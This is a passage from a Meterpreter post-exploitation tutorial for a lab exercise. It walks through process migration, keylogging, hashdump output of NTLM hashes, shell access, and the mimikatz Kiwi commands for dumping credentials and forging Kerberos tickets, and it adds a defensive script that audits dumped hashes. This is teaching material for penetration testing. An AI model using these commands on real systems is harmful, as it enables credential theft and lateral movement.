 548   540   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 596   540   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 604   588   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 644   588   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 692   596   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 700   692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  
 716   596   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 724   596   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 764   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 828   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 864   828   WmiPrvSE.exe                                                       
 900   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  
 952   692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1076  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1164  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
 1168  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  
 1244  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
 1276  1304  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\cmd.exe
 1304  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1340  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1388  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe[...]

Migrate

Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the keyscan_start, keyscan_stop, and keyscan_dump command options to make Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session.

To migrate to any process, you need to type the migrate command followed by the PID of the desired target process. The example below shows Meterpreter migrating to process ID 716.

meterpreter > migrate 716
[*] Migrating from 1304 to 716...
[*] Migration completed successfully.
meterpreter >

Be careful; you may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver). You may not be able to gain them back.

Hashdump

The hashdump command will list the content of the SAM database. The SAM (Security Account Manager) database stores users' passwords on Windows systems. These passwords are stored as hashes in the NTLM (New Technology LAN Manager) format.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >

While these hashes cannot be reversed mathematically, you may still discover the cleartext password using online NTLM databases or a rainbow table attack. These hashes can also be used in Pass-the-Hash attacks to authenticate to other systems on the same network that these users can access.
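From the defender's side, the same output is an audit source. As an added example (not the room's code), this Python script parses hashdump lines in the user:RID:LM:NT::: format and flags blank passwords (the NT hash of the empty string, which is exactly what the Administrator and Guest lines above show), stored LM hashes, and one NT hash shared by several accounts, which is what lets a single Pass-the-Hash hop reach all of them; the svc_backup line is constructed.

```python
"""Audit Meterpreter `hashdump` output for weak credential hygiene.

Added example, not part of the original room. The first three lines are the
hashdump output shown above; the svc_backup account is constructed to exercise
the LM-hash and password-reuse checks.
"""
from collections import defaultdict

# pwdump line format: username:RID:LM-hash:NT-hash:::
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string (blank password)

HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
svc_backup:1001:0123456789abcdef0123456789abcdef:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""


def parse_hashdump(text):
    """Return a list of (user, rid, lm, nt) tuples; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            continue  # prompt line, blank line or something that is not a pwdump row
        user, rid, lm, nt = fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue  # both hashes are 16 bytes, 32 hex characters
        records.append((user, rid, lm, nt))
    return records


def audit(records):
    """Return sorted (user, issue) pairs that a defender would act on."""
    issues = []
    by_nt = defaultdict(list)
    for user, rid, lm, nt in records:
        if nt == EMPTY_NT:
            issues.append((user, "blank password"))
        else:
            by_nt[nt].append(user)
        if lm != EMPTY_LM:
            # LM hashing is case-insensitive, 7-character-chunked DES; it should be disabled.
            issues.append((user, "LM hash stored (legacy, trivially crackable)"))
    for users in by_nt.values():
        if len(users) > 1:
            for user in users:
                others = ", ".join(u for u in users if u != user)
                issues.append((user, f"same NT hash as {others} (reuse; one hash opens all via pass-the-hash)"))
    return sorted(issues)


if __name__ == "__main__":
    for user, issue in audit(parse_hashdump(HASHDUMP)):
        print(f"{user}: {issue}")
```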

Search

The search command is useful to locate files with potentially juicy information. In a CTF context, this can be used to quickly find a flag or proof file, while in actual penetration testing engagements, you may need to search for user-generated files or configuration files that may contain password or account information.

meterpreter > search -f flag2.txt
Found 1 result...
    c:\Windows\System32\config\flag2.txt (34 bytes)
meterpreter >

Shell

The shell command will launch a regular command-line shell on the target system. Pressing CTRL+Z will help you go back to the Meterpreter shell.

meterpreter > shell
Process 2124 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Post-Exploitation

Meterpreter provides several important post-exploitation tools.

Commands mentioned previously, such as getsystem and hashdump will provide important leverage and information for privilege escalation and lateral movement. Meterpreter is also a good base you can use to run post-exploitation modules available on the Metasploit framework. Finally, you can also use the load command to leverage additional tools such as Kiwi or even the whole Python language.

meterpreter > load python
Loading extension python...Success.
meterpreter > python_execute "print 'TryHackMe Rocks!'"
[+] Content written to stdout:
TryHackMe Rocks!

meterpreter >

The post-exploitation phase will have several goals; Meterpreter has functions that can assist all of them.

  • Gathering further information about the target system.
  • Looking for interesting files, user credentials, additional network interfaces, and generally interesting information on the target system.
  • Privilege escalation.
  • Lateral movement.

Once any additional tool is loaded using the load command, you will see new options on the help menu. The example below shows commands added for the Kiwi module (using the load kiwi command).

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.

These will change according to the loaded extension, so running the help command after loading one is always a good idea.

Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)